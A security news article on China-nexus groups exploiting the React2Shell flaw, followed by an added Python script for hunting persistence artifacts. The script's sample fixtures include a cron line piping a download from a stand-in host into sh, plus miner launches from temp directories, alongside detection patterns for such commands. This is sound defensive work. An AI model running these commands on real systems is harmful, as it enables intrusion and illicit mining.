At least five Chinese cyber-espionage groups are actively exploiting a critical React vulnerability, known as React2Shell, to gain initial access to victim networks, Google’s threat analysis team said.
The flaw, a critical unauthenticated remote code execution issue in React Server Components tracked as CVE-2025-55182, was publicly disclosed on Dec. 3, 2025. Since then, React2Shell has been actively exploited by multiple threat actors for reconnaissance and to deploy various malware families. Observed payloads include cryptominers, the PeerBlight Linux backdoor, the CowTunnel reverse-proxy tunnel, the Go-based ZinFoq implant, and a Kaiji botnet variant.
Researchers report a surge in opportunistic attacks primarily targeting internet-exposed Next.js applications and containerized workloads in Kubernetes and managed cloud environments. Cloudflare notes that attackers are profiling potential victims by gathering application metadata, such as icon hashes, SSL certificate details, and regional identifiers, before exploiting the flaw. Alongside the React2Shell issue, two further RSC-related vulnerabilities (CVE-2025-55183 and CVE-2025-55184) were also disclosed, both tied to RSC payload handling and Server Function behavior. These two flaws are distinct issues and are not related to React2Shell.
Google Threat Intelligence Group (GTIG) says that multiple threat clusters are leveraging the vulnerability to deploy a range of malicious tools, including the MINOCAT tunneler, SNOWLIGHT downloader, HISONIC and COMPOOD backdoors. The threat actors tracked by Google include UNC6600, UNC6586, UNC6588, UNC6595, and UNC6603, all linked to China-nexus operations targeting organizations worldwide that run unpatched versions of React and Next.js.
In one campaign, UNC6600 exploited React2Shell to deliver the MINOCAT tunneler, using scripts to establish persistence via cron jobs, systemd services, and shell configuration files. UNC6586 was observed deploying the SNOWLIGHT downloader, part of the publicly available VSHELL backdoor, while UNC6588 downloaded the COMPOOD backdoor with no further follow-on activity observed. UNC6603 deployed an updated HISONIC backdoor that abuses legitimate cloud services for command-and-control, and UNC6595 used the vulnerability to install ANGRYREBEL.LINUX malware disguised as the OpenSSH daemon.

Google said Amazon Web Services has also observed exploitation by China-nexus groups Earth Lamia, tracked by GTIG as UNC5454, and Jackpot Panda.
GTIG observed multiple incidents beginning December 5 in which threat actors exploited CVE-2025-55182 to deploy the XMRig cryptocurrency miner for illicit mining. In one attack chain, an actor downloaded a shell script named sex.sh, which retrieved and executed XMRig from GitHub and attempted to establish persistence by creating a new systemd service called system-update-service. GTIG has also observed extensive discussion of CVE-2025-55182 on underground forums, where actors shared scanning tools, proof-of-concept code, and their experience using these tools.
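The persistence mechanisms named in the two preceding paragraphs (cron jobs, systemd services, shell configuration files, and a miner service called system-update-service launched after a script named sex.sh) are the artifacts a defender would hunt for on a host running an exposed Next.js application. The script below is an added example, not Google's or GTIG's tooling: it audits constructed samples of systemd unit files, crontab lines and shell rc files against a few heuristics (downloads piped to a shell, execution from world-writable temp directories, references to XMRig, background nohup launches, and the service and script names reported in the article). The sample file contents, the hostnames ending in .invalid, and the heuristic list itself are assumptions made for illustration; a real deployment would read these locations from disk and tune the patterns to its own baseline.

```python
"""Hunt for persistence artifacts of the kind the article describes.

Added example, not GTIG or Google code. The service name "system-update-service"
and the script name "sex.sh" come from the article; all file contents below are
constructed. The heuristic patterns are assumptions a defender might start from.
"""
import re
from dataclasses import dataclass

# Artifact names reported in the article
KNOWN_SERVICE_NAMES = {"system-update-service"}
KNOWN_SCRIPT_NAMES = {"sex.sh"}

# Generic heuristics for persistence locations (assumed, not from the article)
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"(?<![\w.-])/(tmp|dev/shm|var/tmp)/"), "executes from world-writable temp dir"),
    (re.compile(r"\bxmrig\b", re.I), "references XMRig miner"),
    (re.compile(r"\bnohup\b.*&\s*$", re.M), "background nohup launch"),
]


@dataclass
class Finding:
    source: str    # "systemd", "cron" or "shellrc"
    location: str  # unit file name, crontab line or rc file path
    reason: str


def _scan_text(source, location, text):
    """Apply every heuristic and known script name to one blob of text."""
    findings = []
    for pattern, reason in SUSPICIOUS_PATTERNS:
        if pattern.search(text):
            findings.append(Finding(source, location, reason))
    for name in KNOWN_SCRIPT_NAMES:
        if name in text:
            findings.append(Finding(source, location, f"references known script {name}"))
    return findings


def scan_systemd_units(units):
    """units: {unit_file_name: unit_file_contents}. Only Exec* lines launch code."""
    findings = []
    for name, body in units.items():
        if name.removesuffix(".service") in KNOWN_SERVICE_NAMES:
            findings.append(Finding("systemd", name, "unit name matches reported persistence service"))
        exec_lines = "\n".join(l for l in body.splitlines() if l.strip().startswith("Exec"))
        findings.extend(_scan_text("systemd", name, exec_lines))
    return findings


def scan_cron_entries(entries):
    """entries: crontab lines; comments and blank lines are ignored."""
    findings = []
    for line in entries:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        findings.extend(_scan_text("cron", line.strip(), line))
    return findings


def scan_shell_rc(files):
    """files: {path: contents} for .bashrc/.profile-style files."""
    findings = []
    for path, body in files.items():
        findings.extend(_scan_text("shellrc", path, body))
    return findings


# Constructed sample data (one malicious and one benign item per location)
SAMPLE_UNITS = {
    "system-update-service.service": (
        "[Unit]\nDescription=System Update Service\n"
        "[Service]\nExecStart=/tmp/.x/xmrig -o pool.invalid:3333\nRestart=always\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "nginx.service": "[Unit]\nDescription=nginx\n[Service]\nExecStart=/usr/sbin/nginx -g 'daemon off;'\n",
}
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * curl -s http://example.invalid/sex.sh | sh",
]
SAMPLE_RC = {
    "/root/.bashrc": "alias ll='ls -la'\nnohup /dev/shm/.t/agent >/dev/null 2>&1 &\n",
    "/home/dev/.profile": "export PATH=$HOME/bin:$PATH\n",
}


def run_hunt():
    """Scan all three sample locations and return every finding."""
    return (scan_systemd_units(SAMPLE_UNITS)
            + scan_cron_entries(SAMPLE_CRON)
            + scan_shell_rc(SAMPLE_RC))


if __name__ == "__main__":
    for f in run_hunt():
        print(f"[{f.source}] {f.location}: {f.reason}")
```

On the sample data the benign nginx unit, certbot cron entry and developer .profile produce no findings, while the miner service is flagged three times (name, temp-directory path, XMRig reference), the cron downloader twice, and the root .bashrc twice. Matching only on names such as system-update-service is brittle, since an actor can rename a unit freely; the generic heuristics are what carry over to the next campaign, which is why the example keeps them separate from the article-specific indicators.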